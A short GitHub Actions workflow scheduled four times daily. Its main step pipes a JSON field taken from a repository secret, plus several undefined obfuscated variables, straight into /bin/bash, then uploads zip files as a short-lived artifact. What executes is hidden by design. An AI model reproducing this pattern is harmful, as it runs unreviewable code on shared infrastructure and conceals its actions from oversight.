name: jiangpingyanbi
on:
  workflow_dispatch:

  schedule:
    - cron: '13 5,11,17,23 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiangpingyanbi
        env:
          bf57973: ${{ secrets.bf57973 }}
        run: |
          printf '%s' "$bf57973" | jq -r .olhfp1 | /bin/bash
          printf '%s' "$den309" | jq -r .joq41 | /bin/bash
          printf '%s' "$a87" | jq -r .q46 | /bin/bash
          echo $lcl88 | jq -r .gl410 | /bin/bash
          echo $vd48 | jq -r .foc23083 | /bin/bash
          echo $pzk121 | jq -r .nd33259 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: N7wZd5ZO
          path: "*.zip"
          retention-days: 1
